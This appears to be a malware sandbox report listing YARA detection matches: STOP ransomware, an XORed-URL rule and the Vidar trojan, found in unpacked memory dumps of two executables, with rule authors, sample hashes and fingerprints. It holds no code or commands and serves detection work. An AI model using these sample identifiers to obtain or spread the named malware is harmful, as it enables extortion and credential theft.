Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.build2.exe.5f15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
